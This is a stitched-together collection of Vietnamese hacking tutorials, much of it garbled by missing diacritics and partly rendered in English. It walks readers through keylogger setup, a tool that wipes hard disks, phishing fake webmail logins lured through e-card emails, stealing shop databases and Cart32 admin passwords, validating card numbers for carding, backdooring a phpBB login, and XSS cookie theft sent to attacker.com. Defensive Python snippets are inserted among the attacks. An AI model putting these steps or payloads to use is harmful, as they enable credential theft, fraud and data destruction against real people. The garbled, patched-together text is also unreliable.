Kythuat Hack
mt bi vit v cvv2
Th Vin Sch
Mask Link
Phn Mm Aiepr
lm cch no kho IE : Download Here
vo internet options
vo tab content
click trn enable v chn nhng site cn kho, hoc c th kho bt k site hay
website no bn khng mun ngi khc xi my ca bn c th vo c ( phn
ny cc bn t tm hiu )
bo ng k thnh cng
*click trn biu tng nh hnh sau xem cc pw v thng tin cho php save trong
my
mn hnh hin th
*cui cng l chc nng coi nhng password c save trong my khi bn click
save khi login
sau khi click vo file setup cc bn chn file server v click Open nh hnh di :
sau khi cu hnh xong cho server ca barok bn click vo Save Server nh hnh
trn, lc bn s nhn c mn hnh chc mng server save thnh cng nh
sau :
+nhng thng tin thm : revelation khng lm vic trn windows XP ( v windows XP
bc 4
Set password cho keylogger ca bn khi b ngi khc xm nhp bng cch check
vo box " Password Protection " sau chn password ca bn.
Crack cho keylogger: cc ban crack vi Username: vicki v Key: LGvFzeX= crack ny
c trong file crack cc bn dowload ban u.Coi hnh.
bc 2
bc 5
cng vic " ph hoi" cc k n gin ch bng 2 click chut vo file hdkp.exe nh
hnh trn l........ cng ca bn s cht ngay trong ln sau khi ng my! ch c
di m thc hnh ngay, tr khi bn mun thay cng mi, cn nu khng, k thut
phc hi cng sau khi dnh con ny cha c vit nam !
gii thch qu trnh lm hng cng:
ngay sau khi click vo file, chng trnh s bt u ph hoi tt c data trn cng
ca bn, mc d cho bn c dng chng trnh gia chng th vn th ! trong ln
sau khi ng my tnh chng trnh s t ng tip tc chy !
chng trnh ny hot ng nh vo thay i nhng thng tin trong file .bat vn rt
quan trng trong windows ! n s ph cc track t cng v bn kh m c th
phc hi li d liu hay lm g vi cng bn c, sau khi chy chng trnh cng
ca bn coi nh l cc st ! khng lm g c ngoi cch vt vo st rc !
ch : chng trnh ny khng lm vic trn nhng cng dng MACS !
Ngoi ra, mnh cn c 1 vi phn mm khc mun...chia s vi cc bn, tnh cht
cng l ph hoi y nh th, hdd v windows , nhng vi mc nh hn
cc bn c th dowload format winkill winkill32
+++++++++++++++++++
anhlanonline@yahoo.com
S Dng Nuke
*Bi vit vi mc ch hc tp. mnh khng khuyn khch cc bn i ph hoi v
hon ton khng chu trch nhim vi bi vit ca mnh.
bc 2
Phn Mm ShowPass
mnh xin gii thiu n cc bn phn mm ShowPass
+h iu hnh p dng: windows 95,98,98se,Me ( khng dng c vi windows
2000 tr ln )
+chc nng: tm li username v password connect vo internet khi l qun hay b
mt ( m save vo my )
+ng dng : khi qun, mt, hoc xi n trm account t my ang ngi
+cch dng: sau khi unzip, click vo file showpass chy chng trnh, sau click
nt "DIALUPs" tm li hay n trm account
+homepage ca phn mm ny http://www.xcoder.com
+++++++++++++++++++
anhlanonline@yahoo.com
Stealther
Download
Gii thiu :
Stealther l mt phn mm kt hp vi trnh duyt IE gip bn m bo s "nc danh" khi duyt web
vo download files,Stealther gip bn che giu IP tht ca mnh khi gh thm cc website, chn cc Cookie
nguy him v m bo s bo mt cho thng tin t my tnh ca bn khi cc website "tnh bo".
Stealther bo v mc ti a quyn c nhn ca bn khi lt web, Stealther lun lun t ng cp nht
nhng anonymous proxy v kim tra kh nng "nc danh" ca cc proxy ....
Ni tm li Stealther l mt phn mm tuyt vi i vi nhng ngi mun an ton khi ln mng.
Hn dn s dng :
Ci t :
Sau khi download bn chy file stealther_setup.exe bt u qu trnh ci t:
Sau bn lm theo cc hng dn trong qu trnh ci t sau khi ci t xong bn chn 1 trong 2 la chn.
1 l khi ng li windows, 2 l khi ng sau, tip tc qu trnh.
Nhp vo mc HTTP : Proxy address to use : 127.0.0.1 Port 14000 --> OK th l xong tit mc thit lp
thng s cho IE gi n tit mc thit lp cho Stealther.
Thit lp cho Stealther cng n gin nh thit lp cho IE thi. Show windows m ca s chnh ca
chng trnh, trong ca s chnh bn c 3 la chn trong mc Change Surfing Mode to la chn mode
"nc dnh" theo ti la chn tt nht l la chn th 2 Strealth Mode.
Tip na bn vo menu Proxy-engine --> View/Edit/Check xem proxy list. Bn c th thm, sa, xo,
check proxy s dng.
thm 1 proxy vo list bn vo munu Edit --> Add new proxy entry
Nhp proxy nh hnh trn ri nhn Apply, ban cng c th Add nhiu proxy mt lc vo list bng cch copy
v paste
kim tra proxy bn vo menu Check --> Check All hoc Check Selected.
Mt proxy tt th s c mc Working l yes nu proxy no c kh nng "nc danh" th mc Anonymos l
Yes. Bn c cng nhiu proxy nh vy th cng tt. Khi xong xui nhng bc trn, kim tra xem thnh
qu ca cc qu trnh bn thc hin, bn vo y check xem proxy by gi ca bn th no. Ok. ht!
Chc bn thnh cng!
bc 2:
checkmail ti email m bn va enter ( ca mnh phi check hm mail
alonedrinkwine@msn.com cn cc bn s check hm mail ca cc bn xi ng
k )
click vo link m bravenet va a cho nh hnh di y :
iu quan trng nht trong phn ny l box "website URL" .Ti box ny bn hy
enter a ch m bn mun victim nhn thy sau khi click vo form fakelogin ca cc
bn, trong v d ny mnh chn site riversongs.com -l mt site v ecard :
sau khi click register nh hnh v bn s thy 1 trang tip theo, khng cn lm g c
ngoi click vo continue nh hnh :
sau khi save file ny li di dng .htm, bn view upload chng ln website no
ri th login qua , sau checkmail ti email bn ng k lc u, s thy nh th
ny :
sau cng lm tng t yahoo ri save li di dng .htm nh hnh di, sau
upload ln website ca cc bn ri g victim vo chi ! coi demo ti y
Hack Mail.vnn.vn
u tin vo http://mail.vnn.vn cng view soucre v paste sau th <head> ri save
di dng file .htm :
coi demo ti y
Hack @ttvnonline.com
u tin cng vo website http://ttvnonline.com chn email ri view soucre :
save lai di dng .htm ri lm nh yahoo hoc hotmail, nhng khi click vo th
khng thy ci lgo ca ttvnonline u ! nh hnh di , nu khng c chc chn
victim s ngi ng rt nhiu !
coi demo ti y
okies, nh vy s qua mnh hng dn cc bn ly trm pw email ca 4 webmail
kh thng dng, tng t nh th bn s em i lm vi cc webmail khc m bn
bit!
nu bn lm xong vic upload nhng page .htm c sa i ln host ca bn,
hy click qua page3 coi cch lm 1 thip in t la victim !
sau khi bit lm fake login ca cc webmail v r victim vo "chi" n trm pw
ca h thnh cng ri, th t nhin c mt iu ny sinh ! l chng nh mi ln
Check
http://www.riversongs.net/Flash/you.html
=====================================================
YOURE A WINNER!!
No Scams, No Kidding- Everything Is FREE!!
School Cool Barbie, Coca-Cola Monopoly, Yankees vs. Mets Chess Set,
Simpsons Wall Clock, Clue, Star Wars Monopoly, Cordless Phones,
Weight Watchers Software, Scooby Doo Gifts, Curious George Watches,
and Biker Sunglasses, all yours for FREE!!
Dont miss out on other FREE gifts like, a Bart Simpson Lunch Box,
Batman Comic Books, James Dean glasses, and MORE!!
All gifts are FREE!!
Dont Miss Out, Click Here While Theres Still Time:
http://www.supertaf.com/adt.php?a=7608461
=====================================================
====================================================
NEED A CAR - New or Used?
http://www.supertaf.com/adt.php?a=7608460
Good or Problem Credit - eCarCredit will can get your car and the loan
you deserve. Thousands of people across the country have purchased
cars and received auto loans with eCarCredit's help through our
NATIONWIDE NETWORK of auto dealers & lenders.
Don't have perfect credit? You can get a car loan with our FREE 2
minute application!
Plus our Loan Advisors HELP YOU FIND A CAR that fits your needs
from a local dealer at no extra cost.
Click here for your new car TODAY!
http://www.supertaf.com/adt.php?a=7608460
*Must be over 18, & approved for credit. Not available in TX, AL, AK,
AR,
HI.
Offer subject to change without notice. Copyright 2002 eCarCredit.com
====================================================
---------------------------------------------------------------------You received this email because someone visited our site and wanted to
tell you about it. To answer, simply reply to this message.
Click here if you don't want to be reached through our service:
http://supertaf.com/optout.php?email=admin()anhlan;;us
Report Abuse: http://supertaf.com/index.php?page=abuse
Got a question? http://supertaf.com/index.php?page=faq
Sender's IP address: 203.162.132.168
---------------------------------------------------------------------gi sa thnh th ny (dng notepad hay front page edit link nhn ecard thnh link
dn ti page fakelogin ca cc bn - tu theo victim c email th no m link n
page sn fake ph hp ):
Your friend anh lan found a site that they thought you'd like.
it out:
Check
http://www.riversongs.net/Flash/you.html
=====================================================
YOURE A WINNER!!
No Scams, No Kidding- Everything Is FREE!!
School Cool Barbie, Coca-Cola Monopoly, Yankees vs. Mets Chess Set,
Simpsons Wall Clock, Clue, Star Wars Monopoly, Cordless Phones,
Weight Watchers Software, Scooby Doo Gifts, Curious George Watches,
and Biker Sunglasses, all yours for FREE!!
Dont miss out on other FREE gifts like, a Bart Simpson Lunch Box,
---------------------------------------------------------------------You received this email because someone visited our site and wanted to
tell you about it. To answer, simply reply to this message.
Click here if you don't want to be reached through our service:
http://supertaf.com/optout.php?email=admin()anhlan;;us
Report Abuse: http://supertaf.com/index.php?page=abuse
Got a question? http://supertaf.com/index.php?page=faq
Sender's IP address: 203.162.132.168
---------------------------------------------------------------------sau khi edit nh trn, send email ny n email ca victim, victim khi m mail,
nhn card s thy mn hnh fakelogin v nhp user cng nh password vo
v th l bn ch cn checkmail ly pw send v !
chc cc bn hack vui v
+++++++++++++++++++
anhlanonline@yahoo.com
ngay khi click go! cc bn thy xut hin thng bo save hoc open file mdb ny !
thnh cng ri !
anhlanonline@yahoo.com
cc bn s thy v s site dng VP-ASP shopping ! tuy nhin nhiu site fix, v
cng vic ca cc bn l d tm nhng site cha fix ! cc bn c th chn bt c
trang no trong list site dng phn mm VP-ASP shopping :
nh hnh di y :
mn hnh hi save hay open ! wow! thnh cng ri ! xin chc mng !
double click chut vo file db trn cc bn s thy rt nhiu tab, thng thng nhng
thng tin trong tab oder l nhng thng tin m chng ta cn tm kim ( cc ), click
ln tab view :
sau khi click tab oder cc bn s thy rt nhiu thng tin, nhiu khi c c cc !
+++++++++++++++++++
anhlanonline@yahoo.com
2.5
3.0
3.5a
4.0
: tt c u b li
: hu ht u b li
: b li 1 phn nh
: gn nh khng b li
hoc : http://www.sitename.com/cgi-bin/cart32/sitename-OUTPUT.txt
Ly Admin Passwords : http://www.sitename.com/cgi-bin/cart32.ini
Ly Clients Passwords : http://www.sitename.com/cgibin/cart32.exe/cart32clientlist
Hin Th Cc Th Mc :
http://www.sitename.com/cgi-bin/cart32.exe/error
+++++++++++++++++++
anhlanonline@yahoo.com
hng dn lm mt feedback
khi lm website chc chn ai cng mun lm 1 ci feedback nhng ngi gh
thm website mt thi gian vo email ca h gi nhng kin ng gp n
cho admin ( thay vo ch cn vo feedback send mail )
ok, vic ny rt d v y mnh lm sn cho cc bn 1 feedback bng ting vit
!download n y
sau khi download v view file feedback.php bng notepad v edit email
admin@anhlan.us bng email ca bn :
+++++++++++++++++++
anhlanonline@yahoo.com
Links
Chng ti xin trn trng gii thiu
Type                        Prefix            Length
MASTERCARD                  51-55             16
VISA                        4                 13, 16
AMEX                        34, 37            15
Diners Club/Carte Blanche   300-305, 36, 38   14
Discover                    6011              16
enRoute                     2014, 2149        15
JCB                         3                 16
JCB                         2131, 1800        15
- compute the sum: (1+0) + 4 + (6) + 4 + (1+6) + 4 + (6) + 4 + (4) + 9 + (0) + 0 + (2) + 0 + (6) + 3 = 60
- take the sum mod 10: if the remainder is 0 the number is correct; if it is not 0 the number is wrong.
60 mod 10 = 0 - Luhn Check Digit: passed.
Step 3: verify the checksum
- double each digit in an odd position in turn, excluding the last digit
 5  4  3  4  8  4  3  4  2  9  0  0  1  0  3
x2    x2    x2    x2    x2    x2    x2    x2
---------------------------------------------
10     6    16     6     4     0     2     6
- compute sum(*): (1+0) + 4 + (6) + 4 + (1+6) + 4 + (6) + 4 + (4) + 9 + (0) + 0 + (2) + 0 + (6) = 57
- add up the digits of sum(*)
5 + 7 = 12
- multiply that result by 10, subtract sum(*), then take mod 10: if the remainder equals the last digit of the card number the number is correct; otherwise it is wrong.
(12 x 10 - 57) % 10 = 3 - Checksum: passed.
5434-8434-2900-1033 - this is a valid card number
Example 2: 4128-674-342-188 - valid
- prefix = 4, length = 13 - Valid Visa CV - Citibank
- 4221661446441168 = 60, (60 mod 10) = 0
- 814837838228 = 62, 6 + 2 = 8, (8 x 10 - 62) % 10 = 8
However, you can only check whether the card number is right or wrong. To use the card you need to know other information about it, such as the cardholder, his address and phone number, ...
Supporting tool: (http://www.elfqrin.com/DisCard.html)
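The prefix/length table and the Luhn check above are what a defender uses to find card numbers that have leaked into logs or tickets and to mask them. The following is an added example, not part of the original article; `redact_line`, `classify` and the sample lines in the comments and tests are constructed for illustration.

```python
import re

# Prefix/length rules copied from the table above: (brand, prefixes, lengths).
CARD_RULES = [
    ("MASTERCARD", tuple(str(p) for p in range(51, 56)), (16,)),
    ("VISA", ("4",), (13, 16)),
    ("AMEX", ("34", "37"), (15,)),
    ("Diners Club/Carte Blanche",
     tuple(str(p) for p in range(300, 306)) + ("36", "38"), (14,)),
    ("Discover", ("6011",), (16,)),
    ("enRoute", ("2014", "2149"), (15,)),
    ("JCB", ("3",), (16,)),
    ("JCB", ("2131", "1800"), (15,)),
]

# 13 to 16 digits, optionally separated by single spaces or hyphens, and not
# embedded in a longer run of digits (order ids, timestamps and the like).
PAN_CANDIDATE = re.compile(
    r"(?<!\d)(?<!\d[ -])(?:\d[ -]?){12,15}\d(?![ -]?\d)")


def luhn_valid(digits: str) -> bool:
    """Luhn check as worked through above: counting from the right, double
    every second digit, add the digits of each product, and require the
    total to be a multiple of 10."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9          # same as adding the two digits of the product
        total += d
    return total % 10 == 0


def classify(pan: str):
    """Return the brand whose prefix and length both match, else None."""
    for brand, prefixes, lengths in CARD_RULES:
        if len(pan) in lengths and pan.startswith(prefixes):
            return brand
    return None


def redact_line(line: str):
    """Mask every card number in a log line, keeping only the last four
    digits. Returns (redacted_line, findings); findings is a list of
    (brand, last4) tuples for alerting."""
    findings = []

    def _replace(match):
        pan = re.sub(r"[ -]", "", match.group())
        brand = classify(pan)
        if brand is None or not luhn_valid(pan):
            return match.group()        # not a card number: leave untouched
        findings.append((brand, pan[-4:]))
        return "*" * (len(pan) - 4) + pan[-4:]

    return PAN_CANDIDATE.sub(_replace, line), findings
```

Requiring both the table match and the Luhn check keeps false positives low: a 16-digit order id that happens to start with 4 is only masked if its check digit also fits.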
LESSON #2
NVH (c)
Breaking into another PC while online:
Normally, before breaking into a computer, a hacker tries to install a Trojan to open a port for the intrusion; the best known is the Back Orifice Trojan.
This lesson shows you how to connect to a computer running Windows over the Internet and retrieve information from it.
Tools needed:
First you need a scanning program called a NetBIOS scanner. I use Legion or Winhackgold (download: http://www.hackerclub.com). The program scans for all machines that have file sharing open on the same NetBIOS network.
Getting started:
After connecting to the network, go to Start/Run and type winipcfg. You will get the IP address that your ISP assigns you each time you connect; if you connect by modem this IP changes and is called a dynamic IP.
In Legion's SCAN FROM field, enter your own IP address. For example, my address is 203.160.11.48, so in Legion I enter only 203.160.11. Then in Legion's TO field enter 203.160.xx (xx is any number you choose; you should pick the one closest to your own IP, I chose 12).
Now press the SCAN button. Legion starts scanning and lists all the IP addresses it finds from 1 to 254. If you are lucky, when you select an IP address you will see the following:
Shared resources at \\206.11.11.42
Sharename   Type   Comment
---------------------------------------------
A           Disk   Floppy
CDRIVE      Disk   C:\ Drive
DDRIVE      Disk   D:\ Drive
CDROM       Disk   CD-Rom Read Only
The command was completed successfully.
//
$dbms = "mysql4";
$dbhost = "localhost";
$dbname = "DB name here";
$dbuser = "DB user here";
$dbpasswd = "DB passwd here";
$table_prefix = "phpbb_";
define('PHPBB_INSTALLED', true);
?>
## config.php source end
5.2.2 Upload config.php
Upload the config.php file into the brand-new forum that you just uploaded.
http://root/mysite/config.php
5.2.3 Test
Try opening http://root/mysite/. If your forum shows exactly the same data as http://root/victim/phpBB_path, this step has succeeded.
Step 6. Modify the mirror site's source code
The purpose of this step is to modify your forum's source code so that you can log in to its Admin panel. If you have learned PHP this is fairly easy.
I will present one method: the classic crack.
6.1 The classic crack
6.1.1
When you want to crack the password of an exe file, you can disassemble it into a .asm file with any of the many programs available today.
6.1.2
Find the conditional jump instructions (JP something or other; there are loads of them) in the password-checking code.
6.1.3
Change them into unconditional jumps.
6.1.4
Recompile into an exe file and that is it: it accepts whatever password is entered.
6.2 Modifying the source code
Modify the login.php file so that it lets you log in under any nickname with one pre-chosen password.
6.2.1 Choose a common password for all nicks.
Passwords in phpBB are actually encoded with MD5, so decoding them can be very difficult. If you understand this kind of encoding well you can work out a suitable password for yourself; otherwise you can use the password I have already decoded, which is:
"hainam@hainam.org"
That is my e-mail address. When this password is encoded with MD5 it becomes the following password: "692e2c95b693cf6fbec8ea5c40536b9e"
hainam@hainam.org => 692e2c95b693cf6fbec8ea5c40536b9e
6.2.2 Set the common password for all nicks
First open the login.php file and find the following section:
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
## file login.php ..
Insert the variable $hack = "692e2c95b693cf6fbec8ea5c40536b9e";
That is, change the code to:
## file login.php ..
define("IN_LOGIN", true);
define('IN_PHPBB', true);
$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'common.'.$phpEx);
$hack = "692e2c95b693cf6fbec8ea5c40536b9e";
## file login.php ..
Next, find the following code:
## file login.php ..
else
{
if( md5($password) == $row['user_password'] && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
## file login.php ..
Change it to:
## file login.php ..
else
{
if( md5($password) == $hack && $row['user_active'] )
{
$autologin = ( isset($HTTP_POST_VARS['autologin']) ) ? TRUE : 0;
## file login.php ..
Save the login.php file.
Step 7. Log in as a user with the chosen password
You can now log in to the forum through your own website, http://root/mysite/login.php, under any nickname with the password you chose, here "hainam@hainam.org", including the Admin nick, and get into the Admin Panel.
Note that on your website a user can only log in with the password hainam@hainam.org and not with any other password, not even the correct one.
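The modification described in step 6.2 leaves a recognisable trace: login code that compares md5() of the submitted password with a fixed 32-character hash instead of the value stored in the user's database row. The following added example (not part of the original article) is a source-review check for that pattern; the function name and the two sample strings, which are shortened from the login.php fragments quoted above, are assumptions made for illustration.

```python
import re

# $name = "32 hex characters";  -> an MD5-sized literal stored in a variable
HASH_ASSIGN = re.compile(r"""\$(\w+)\s*=\s*["']([0-9a-fA-F]{32})["']\s*;""")

# md5(...) == <right-hand side>, where the right-hand side is either a plain
# variable, an array element such as $row['user_password'], or a hash literal
MD5_COMPARE = re.compile(
    r"""md5\s*\([^)]*\)\s*={2,3}\s*(\$\w+(?:\[[^\]]*\])?|["'][0-9a-fA-F]{32}["'])""")


def find_hardcoded_hash_checks(php_source: str):
    """Return (line_number, hash) for each md5() comparison whose right-hand
    side is a hash literal or a variable that was assigned one. Comparisons
    against array elements (the database row) are treated as normal."""
    hash_vars = {m.group(1): m.group(2)
                 for m in HASH_ASSIGN.finditer(php_source)}
    findings = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        for m in MD5_COMPARE.finditer(line):
            rhs = m.group(1)
            if rhs[0] in "\"'":
                findings.append((lineno, rhs.strip("\"'").lower()))
            elif "[" not in rhs and rhs[1:] in hash_vars:
                findings.append((lineno, hash_vars[rhs[1:]].lower()))
    return findings


# Constructed samples based on the two login.php fragments shown above.
ORIGINAL_LOGIN = r"""define('IN_PHPBB', true);
if( md5($password) == $row['user_password'] && $row['user_active'] )
"""

MODIFIED_LOGIN = r"""$hack = "692e2c95b693cf6fbec8ea5c40536b9e";
if( md5($password) == $hack && $row['user_active'] )
"""
```

Run over every .php file in a web root, a non-empty result is a reason to compare the file against the vendor's release.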
Summary:
I/ Method
- This is an example of hacking websites from within the same local server. It is not specific to phpBB and can be applied to many other portals or forums; however, to hack each type you must understand it very well, and you should avoid abusing it.
- This method takes a lot of time because a mirror has to be uploaded, but it is very effective. However, it absolutely should not be used carelessly or indiscriminately.
- Hosting providers that allow free hosting are showing that they are very generous, which is all the more reason not to use this method when it is NOT REALLY necessary.
II/ Example
- First I apologise to those who run website ****, because I am going to use your website as the example and it is my first victim.
- I hope that you, the people who want to learn a little more experience, will only look around and not abuse anything or damage their database. I did make a backup, but I am very reluctant to restore it. Moreover, to make sure the next articles are not objected to, I hope everyone will respect my opinion, NOT WRECK ANYTHING IN THE VICTIM'S DB, and put learning and reference first.
- The mirror website of website **** is ****. There you can log in under any nickname in the **** forum with the common password "hainam@hainam.org". Remember that you SHOULD NOT WRECK THEIR DB; only use it for reference.
III/ Lessons learned
What matters is not what we managed to hack but what we learned. Through this article I hope you have understood the following operations:
- Reading the source code of any file on a website that is on the same server (Step 3)
- Experience with passwords, guessing and remembering them (Step 4)
- How to create a mirror website, or how to link one DB to several websites (Step 5)
- The classic crack with ASM (Step 6.1)
You should work out the relationships between portals, forums, guest books, PHP-CGI chat rooms and so on in order to apply this method. You can also hack domain hosting, not only sites of the form http://root/yoursite/ . Paid hosting is not exempt from being hacked either, if the hackers really want to hack it and are willing to pay for hosting on the same server. I leave hacking paid hosting and domains for you to study yourselves. Remember always to pay attention to the URL root of each hosting service. For example, with Cpanel the URL root for domain hosting is http://[ip/ Server]/~user, and so on.
Good luck.
Article by Lukos
Nowadays, Cross Site Scripting (XSS) vulnerabilities are being discovered more and more often in well-known mass-market services such as Yahoo, Hotmail, Ebay...
The hacker and security communities have proven, and given many demonstrations of, the danger of XSS in well-known mass-market services such as Yahoo, Hotmail and Ebay and in popular products such as Apache, Tomcat, IIS and Lotus Domino. These XSS vulnerabilities allow hackers to easily steal users' accounts on web applications.
Carrying out an XSS attack, however, requires a certain level of skill from the hacker. First the hacker tries to steal the user's cookies at the very moment the user is logged in to the web application service.
Almost all mass-market web services use cookies to associate accounts with users. Typical examples are webmail services such as Yahoo, Hotmail, Netscape... Banking and e-commerce services also use cookies for authentication and authorisation.
In a web application login scenario, two authentication tokens have to be exchanged: the username and the password. These two values are stored in cookies and are then used as the single proof of authentication. So to steal the victim's username and password, you first have to steal their cookies. Hackers commonly exploit XSS vulnerabilities to steal the cookies of users on the Internet.
Hackers can also use other techniques indirectly to do this, for example the DNS cache, bugs in your Internet browser, or a Trojan. Once the cookies have been stolen, the hacker can exploit the valuable information stored in them, start directing activity at the web application servers and begin attacking the victim's account. If this succeeds, the hacker has full use and control of your web application accounts.
<img src="mocha:[code]">
<img src="livescript:[code]">
<a href="about :<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=java script:[code]">
<body onload="[code]">
<div style="background-image: url(java script:[code]);">
<div style="behaviour: url([link to code]);">
<div style="binding: url([link to code]);">
<div style="width: expression([code]);">
<style type="text/javascript">[code]</style>
<object classid="clsid:..." codebase="java script:[code]">
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- -- --><script>[code]</script><!-- -- -->
<<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="java script:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script>
For more information see:
http://www.cgisecurity.com/articles/xss-faq.shtml
http://www.w3.org/DOM/
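The list of injection forms above shows why removing `<script>` blocks is not a defence, and the cookie theft described earlier depends on script being able to read the session cookie. The following added example (not from the original article) contrasts a naive filter with HTML output encoding on four of the listed forms, keeping the page's `[code]` placeholder, and builds a session cookie that page script cannot read; all function names are hypothetical.

```python
import html
import re
from http.cookies import SimpleCookie

# Four of the forms listed above, with the page's own [code] placeholder.
PAGE_VECTORS = [
    '<body onload="[code]">',
    '<img src="blah"onmouseover="[code]">',
    '<div style="width: expression([code]);">',
    '<<script>[code]</script>',
]

SCRIPT_BLOCK = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)
ANY_TAG = re.compile(r"<[a-zA-Z][^>]*>")


def blacklist_filter(value: str) -> str:
    """Naive filter: delete <script>...</script> blocks and nothing else."""
    return SCRIPT_BLOCK.sub("", value)


def leaves_markup(value: str) -> bool:
    """True if the value would still be parsed as an HTML tag when echoed."""
    return ANY_TAG.search(value) is not None


def render_reflected(param: str) -> str:
    """Echo a request parameter into a page with HTML output encoding, so
    that <, >, &, and both quote characters arrive as inert text."""
    return "<p>Requested: " + html.escape(param, quote=True) + "</p>"


def session_cookie_header(session_id: str) -> str:
    """Value for a Set-Cookie header. HttpOnly hides the cookie from
    document.cookie, Secure restricts it to HTTPS, SameSite limits
    cross-site sending."""
    cookie = SimpleCookie()
    cookie["session"] = session_id
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = True
    cookie["session"]["samesite"] = "Lax"
    cookie["session"]["path"] = "/"
    return cookie["session"].OutputString()


def survivors_of_blacklist():
    """Vectors that still contain a tag after the naive filter has run."""
    return [v for v in PAGE_VECTORS if leaves_markup(blacklist_filter(v))]


def survivors_of_encoding():
    """Vectors that still contain a tag after output encoding."""
    return [v for v in PAGE_VECTORS if leaves_markup(html.escape(v, quote=True))]
```

Only the `<script>` form is stopped by the filter; the event-handler and style forms pass through unchanged, while encoding at output time neutralises all four.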
A Tradition XSS Power Hjack
To hijack a session, hackers commonly use packet sniffers, brute-force tools... The most common and most suitable approach is still to steal cookies in order to take control of a legitimate user's web application session while that user is logged in to the application. The attacker can then typically perform all of the application's functions with the same privileges as the legitimate user. Below are the steps hackers use to steal a legitimate user's cookies:
- A user logs in to their web application and a session is established. The hacker already knows about a vulnerability in that web application.
- The hacker sends malicious XSS code to the victim through an HTML-formatted e-mail or through an intermediate web page. In some cases the hacker can embed it in common web content such as a guest book or form mail... This malicious code is executed automatically in the victim's browser without their permission. For example, the vulnerability in http://hotwried.lycos.com has the following code:
<html>
<head>
<title>Look at this!</title>
</head>
<body>
<a
href="http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<
script>document.location.replace('http://attacker.com/steal.cgi?'+docum
ent.cookie);</script>"> Check this CNN story out! </a>
</body>
</html>
#######################################################################
Author by : CUCCU ( Members of HVA )
Website : http:// www.vnhacker.org/forum/
Edit by : PTV5 Group
Website : http://www.ptv5online.com ; http://www.ptv5online.net
#######################################################################
Li m u:
Trc tin xin ni trc l bi vit ny l ca ti t nghin cu v vit, bt c bi vit
no post li m khng ghi tn ti l tui "ca ci lng" cho tt lun y
z ---> %7A
Z ---> %5A
1 ---> %31 2 ---> %32 3 ---> %33 4 ---> %34 5 ---> %35
6 ---> %36 7 ---> %37 8 ---> %38 9 ---> %39 0 ---> %30
. ---> %2E
OK, note the following: however convoluted a link is, it still contains letters and digits, so you should not encode everything, only a few sensitive words. Take www11.brinkster.com for example: so that the victim does not recognise brinkster, encode just a few characters:
w%77w1%31.br%69ks%74er%2Ecom
Hehe, reasonable, right?
Good luck.
**********************************************************
Bi vit ca Cuccu__
**********************************************************
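Percent-encoding letters, digits and dots in a host name, as in the sample above, serves no technical purpose, which makes it a useful signal for mail and proxy filters. The following added example (not part of the original article) normalises the host before matching it against a blocklist and counts the needless escapes; the function names and the `.example` hosts in the tests are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

# Characters that never need percent-encoding (RFC 3986 "unreserved").
UNRESERVED = set(
    "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-._~")
ESCAPE = re.compile(r"%([0-9A-Fa-f]{2})")


def analyze_host(url: str) -> dict:
    """Decode the host part of a URL and report escapes that hide ordinary
    letters, digits or dots. Escapes in the path or query are ignored,
    because they are common in legitimate links."""
    if "://" not in url:
        url = "http://" + url          # bare host such as the page's sample
    host = urlsplit(url).hostname or ""
    needless = [m.group(0) for m in ESCAPE.finditer(host)
                if chr(int(m.group(1), 16)) in UNRESERVED]
    return {
        "raw_host": host,
        "decoded_host": unquote(host).lower(),
        "needless_escapes": len(needless),
        "suspicious": bool(needless),
    }


def host_blocked(url: str, blocklist) -> bool:
    """Blocklist lookup on the decoded host, so that an encoded spelling of
    a listed host is still matched."""
    wanted = {entry.lower() for entry in blocklist}
    return analyze_host(url)["decoded_host"] in wanted


# The page's own sample. It decodes to www11.brikster.com: the encoded
# string on the page does not contain the "n" of brinkster.
PAGE_SAMPLE = "w%77w1%31.br%69ks%74er%2Ecom"
```

A filter that compares the raw string against its blocklist misses the encoded form; comparing `decoded_host` does not.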
Ch :
Nu cc bn dng host www.mircd.com, v dng cch m ho Url, cn ch :
* M ho Url thng thng chp nhn tt c cc trang Web, nhng nu bn Save as
trang login ca Yahoo, th n s khng c cc file nh, lc fake login ca bn s
thng l ch nu up ln host m ng link ca bn c m ho (th m xem)
Cch khc phc: sa ng dn ca cc file nh
Khi bn save as, thng l n s save thnh file: Yahoo! Mail - the best.......htm v 1
th mc cha cc file nh v *.js c tn l Yahoo! Mail - the best......_files.
Chnh ci tn long ngong ny khin cho cc file nh nm trong n load rt chm v
nhiu khi khng load c, gy ra hin tng li....., nu bn dng www.mircd.com
th n ch cho upload file, khng cho to th mc mi....
u tin, bn nn sa ci file Yahoo! Mail..... thnh tn ngn gn thi, cng ngn
cng tt (nu bn dng www.mircd.com th nn i thnh index.html)
Dng trnh notepad, m file ra, n t hp phm : ctrl + H ( thay th 1 cm t
thnh 1 cm t khc)
box Find What: in vo l
Yahoo! Mail - The best free web-based email!_files/
box Replace With: trng
Sau bn click vo Replace All thay th
Save file index.html va sa i li, copy tt c cc file trong th mc Yahoo! Mail The best free web-based email!_files v file index.html vo cng 1 th mc khc,
sau upload ln host.....
Okie, lc ny th bn m ho Url thoi mi ri ......
Bc 3: Nghi binh
Theo ti, nu ch c trang fake login th cha gt victim, nht l khi cn nh
trng i tng cn ly pass (nh pass ca ngi yu chng hn ), do cn mt
vi th thut nho nh victim khng nghi ng.......
1) Gi mo Mail Box ca Victim:
Mt Mail Box c m ra m qun khng Sign Out, thng khi truy cp li, Yahoo!
